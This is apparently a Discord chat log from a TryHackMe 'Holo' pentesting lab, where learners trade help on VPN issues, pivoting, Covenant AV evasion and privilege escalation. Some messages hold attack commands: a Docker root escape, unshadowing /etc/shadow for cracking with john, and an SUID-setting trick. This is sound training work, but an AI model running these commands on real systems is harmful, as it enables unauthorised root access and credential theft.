A temporary mitigation is in place. If you’re in the 10.200.69.X network please leave the room and rejoin using the pinned link

https://tryhackme.com/jr/hololive

cry I was on the 69 network connected using the attack machine. Restarted my machine to connect to the new network but now when i try to run the openvpn command i get Options error: In hololive.ovpn:1: Maximum optione line length (256) exceeded

regenerate your conf file

I have tried, getting 404-An error occured, or a cloudflare error 502

try go in to the room and leave it, then rejoin the room and regenerate

Did manage to get the file once but the content of the file is just the tryhackme 404 error html

Nah no luck still

what network are you on in holo?

10.200.68.0

i guess you need to wait for answer... from some tech ppl then 🙂

Fair enough, thanks for trying 🙂

@earnest hornet config 404

reeee

reeee

@clear zephyr Hey, this use is having a Holo VPN 404 issue 🙂

Did I really just ping you for you to just ping Ashu

ping train

Does the report have a length limit?

Hi guys, anyone with setting up the vs code?

Cant seem to find the option

It's not VS Code, it's full visual studio

is it not from one of these?

go for 2019, community is free to use

Thanks much!

Gave +1 Rep to @river summit

No, didn’t you already submit yours though?

Actually think I’m thinking of someone else

completed the network finally onto the report what a network for real

Currently working on it and pandoc is failing me. Did a test convert with the editor I'm using and got over 100 pages kekw

Probably Thinking of something else. Almost done with the core documentation....

After installing, windows 11 acting strange. Not opening applications, not showing taskbar etc

i dont run win11 so i have no experience with it, but i cant see anyone complain about win11 and vs2019

cant seem to get anything to work, does no help the task manager too

have you rebooted?

yeah couple of times now.

cmd does not open, win+i for settings does not open

i have no idea why vs would mess up, mabye you need to restore

yeah but cant seem to find the restore option

try to boot up in safe mode, press F8 on boot from bios

100 pages!!!!!!! thats a lot

👀

what did u write so much ? lmao

Didn’t do much even in safe mode.

Re installation is prolly the best

yeah, you need a working machine... but i searched abit and cant see anyone reporting about problems

Funny thing is I never made a backup image too

Using deployment image servicing and management tool

Still nothing 😦

😣

Thanks @river summit for helping me!

Gave +1 Rep to @river summit

np

Any help for Task 22? collabcat is not working.

unshadow /etc/shadow and /etc/passwd ... awk 'length < 11 && length > 9' rockyou.txt > rockyou-10.txt ... and crack it with john, save you time

Thanks.

Gave +1 Rep to @river summit

any body up here working on holo right now

or starting with holo right now

well, if I can't reach ||10.200.169.33|| does it mean i have to reset the network - or just wait until its lifetime ends?

I've tried at morning and it was ok

yep it's a long one. What format would you like the report in?

well thats for u to decide. I sent mine i pdf But broo 👀 100 seems too huge

I am installing Covenant on Kali. I have followed the instructions as mentioned, but when I create a listner no matter how many times it's not visible. It's not showing any errors. Any help?

two options either clean it ( make it undetectable )
or dont use covenant :)

and use something else

maybe clean covenant is the better way

since you would have a c2 in your hands

How does cleaning covenant have anything to do with creating a listener?

idk I just said boooo covenant and did it manually

When the challenge/competition is over is there going to be a place were you can read other people's reports?

cry do we need to specify like what penetration test methology we used?

nist ptes etc?

in the report

like a normal pentest report ?

pivoting is the devils work

sshuttle do the sshuttle things ezpz

I tried that keep getting errors

odd? what errors?

sshuttle is like the most stable option possible and what we suggest using

can you get a stable connection with normal ssh?

yeah

@wind bobcat have you ever seen sshuttle just yeet a connection

@chrome cave

sshuttle is unstable in holo for some reason

I mean that machine has been weirdly unstable for whatever reason that is beyond me but if ssh is stable it should be

like saying closed ports are open unstable

;'..;' jused used something else for scanning.

I even created a root user to use on the victim machine so I had root privs for the tunnel

tried that and still nothing

as linux-admin is not root

What other tools have you used to pivot?

oh dont even start me on chisel

I set it all up and tried to ping the dc got nothing

Ive stared at that machine and still have no clue what its problem is

ICMP doesnt work over proxy

icmp no like pivot

ha

ok

thats really useful to know 🙂

I mean technically once you have root on that machine you could do everything from there surely? lol

It has nothing to do with privileges

youre not running commands from the machine

youre running them through the machine

yeah

I get that element, just getting it to work is another matter haha

this has been the most complex, frustrating YET extremley rewarding network I have ever worked in.....perfect prep for OSCP in my opinion in terms of methods etc

because they're missing -x 10.200.x.33/32

Since when has that been a requirement

I’ve never specified cidr on target

doing the privilege escalation on .33 anyone can give me a nudge of what is the password of www-data?

you dont need it

you need to understand what gtfobins is providing you rather than copy and pasting

man can you give me a nudge on this?

well with just a bit of nix knowledge you can tell that the top line is using sudo to identify the version of docker

we don’t care about that it’s irrelevant to us

if we also look at the line of the actual exploit it specifies an OS that the target isn’t even running so it needs to be modified

I guess I'm having a problem on my command

can I dm you @lone spruce

you can just put everything here

this is what I used

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

also removing the "sh"

also found a blog talking about the same exploit, however both of it is not working

as I said it uses a specific OS that you need to modify

Im having issues getting past the fuzzing task. wfuzz and gobuster both keep crashing the server even with limiting the thread count to 1. Anyone got any tips?

What subnet are you on

146

huh

it could be someone else throwing a bunch of threads. I’m not sure

someone messed up the machine

hahahaha

@lone spruce man, will try to work on this docker privesc after the machine start running as default again. Thanks

Gave +1 Rep to @lone spruce

I always do because it's better to not assume kek

and -x has always been a requirement

last part was time consuming, but an awesome learning

My brain really glitched out because I thought that was a user we put in

hehe

well done

Can anyone help reset the machine?

oh you did from rdp 👀

added myself as local admin who is in the remote desktop group

ah i added myself in domain admins group lol

anyone can give me a nudge or help to moveon on docker pricesc?

*privesc?

Task 42, the same info twice

hello; im in task 20 and i cant privesc with docker suid

it says alpine:latest dont find and cant install it

help?

You can't just copy the command, you need to change it a bit

You need to understand what the command does

I'm on the same task as well, can we help each other if possible?

got it

anyone else having issues? cant scan 192.168.100.0/24 all hosts down

from?

please disregard my previous message

🙂

last night I got all the way to typing out that I needed help with a problem before I figured it out 🙂

this was for a colleuge from my work, I said he should try it out as he is sitting some CREST certs soon and it is good to polish up on different vectors, I had mis infomred him the IP range to scan to get the webserver for holo live

lol

I- I- I don’t have the brain power for this
@frigid nacelle Tiiiiiiim it’s doing the thing

this av evasion stuff is MURDERING me

it was fun in wreath.

and I got shell, b/c my reverse shell code isn't caught by av, but to skip the covenant stuff would be a shame... but... I think there's stuff missing. like the stuff on how to use the tools.

(meaning that I think it presumes a level of knowledge in .net)

it might not be a shame. because u still have to bypass stuff with reverse shell too.

and covenant is weird

thats the fun part 😉

Covenant isn’t weird

there’s just a learning curve

hey guys

need help in privilege escalation in PC FILE server

I didnt able to find out the vulnerable application

have a look in task manager, should "scream" at you 🙂

I mean it’s about the only application there

I got that

thanks pal

Gave +1 Rep to @river summit

thanks

how did you find out that this is vulnerable application ? and in the room it said that you can find the application in the schedule tasks ? Im asking this because I need to improve my perspective and methodology

i dident find it in schedule tasks, but i did see it in task manager early. And then i came across it in unusual folder... searched google for the filename and dll, and was ready to go

looking in the schedule tasks was hopeless as i guess you also found out 😛

for pivoting part? which machine do we need to start the client? on LSRV01? or 02?

forget my question. found the answer

yahh pal, Its totally useless

Thanks once again for the explanation !!!

Gave +1 Rep to @river summit

One more ques ... how to find the dll file for that application ? and that vulnerable application is a single executable file

Procmon need administrative privileges

ask our common best friend... filename dll <what_you_are_about_do> 🙂

the first result i got was spot on

maybe use process hacker 2:)

tell me more about it

is anything happened to the machine cuz I didnt able to ping the machine

any moderator plz help

That is not what mods are for

Mods are for moderating the discord, not site staff or site help

Okay sir

my bad

Also remember that there are a large number of separate networks.

hey guys im having problems with pivoting, any help?

I think I have a dumb question...one of the cidr ranges given in task 8 is 10.200.x.0/24. Am I supposed to figure out which /24 it is or is that a typo?

no, just use 10.200.X.0/24

I fixed my command and I'm guessing it'll only come back with one /24 this time

The third octet depends what network instance you're on. You should know it.

Yea I scrolled up to the diagram after posting. The network had gone offline after I got on. I figured this wouldn't go well right when I wake up.

Hi, can anyone guide on escalating privileges, on L-SRV01? I tried the GTFOBins but it's not working.

What command did you use?

sudo install -m =xs $(which docker) .

That is the wrong command, you need to modify the second command that you get from GTFObins

The docker image is already on the machine

That command is for installing the docker image

Okay Okay, I'll check

I'm getting this, the input device is not a TTY

Have you upgraded your shell?

or stabilized

That message'll be from the sudo part

Yes, missed a step there. Completed it now.

Do we need to specify the image id here?

Getting this on the normal command, Unable to find image 'alpine:latest' locally

yes

there is an image on the machine that you will use

There are 5 images on the machine with 4 having <none> label. I need t try all of them? XD

there should be one at the bottom or at the top of the list iirc?

one that you can use

Got it! Thanks Man!

Glad to help :)

yea maybe that. Thats why i thought to write my own c2 when I have some time cause honestly that way I would know what and how things are working and why its breaking/crashing/getting detected

Do we need to use google colab to crack the password? And which word list is advisable to use?

That’s all specified in the task

Hey anyone knows how to use procmon without administrative privileges ?

you transfer the binary to your own windows machine and use procmon on there

Okay

not really good at web, anyone can help on task 28?

I remember that made me mald

got it. I re-read the instruction again to make sure

thanks for this

This pivoting has my head spun lol, I have ran chisel as per guide....now how on gods green earth can I access the s-srv01 web page via my browser??

and how can I test if I have it set up correctly?]

if you can access the web page. which means it works

proxychains nmap 10.200.197.31 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.14 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-05 16:11 EDT nmap: netutil.cc:1319: int collect_dnet_interfaces(const intf_entry*, void*): Assertion rc == 0' failed. Aborted

I haven't tried to use chisel for proxy nmap, I upload a nmap on the machine and run it for me to view all the internal IP and their ports.

ah ok

i think if I remember chisel does not like ICMP

nmap doesn't like proxies

Setting up a proxy in you’re web browser or using foxy proxy

Yeah I have figured it out now, however....do I need to edit burp to use the proxychain port now to use it?

the AV evasion here is way harder than wreath machine. do you guys use covenant or just ordinary reverse shell?

Did it without covenant.

Can you give me a nudge what did you do? did you try to get a rce first?

something in that order.

but it seems like everyone has done AV evasion differently.

How to add our Example Task on the C2? I followed the instructions and created a YAML on the given path. Used the build command and then run command, but it's still now showing.

If I have to follow the AV evasion tasks, do I need to have a windows OS to build payload?

Same as Simardeep, I've created a yaml example file, cloned the SharpEDRchecker repo into the appropriate directories. Checked the permissions are all the same as the documents that come with Covenant, and entered dotnet build and run commands, but nothing shows up when I reopen Covenant. Any ideas what I might have missed?

In the web exploitation part, I am unable to get the Password Reset Page/Option on S-SRV01. What am I missing?

Not necessarily

Cool, thanks.

Gave +1 Rep to @vapid umbra

how did i trigger the vulnerable application in the PC File server

cry if i clean the covenant then there is no need for amsi bypass right? because i tested it i powershell works also without even used an amsi bypass

You just answered your question in the same message

yes i know i just wanna clarify if it needs to use an amsi bypass

question: I'm doing the task 23 and trying to sshuttle onto the ||10.200.169.33|| by using ||sshuttle -r linux-admin@10.200.169.33 0/0|| but every time connecton is established, when I press any key I'm getting the "Network error: Software caused connection abort" and I'm getting kicked off the session; what could be the problem? I'm using Kali over PuTTY

You might want to include the -x and a more specific subnet to forward?

hmm

why may I want to exclude some subnet?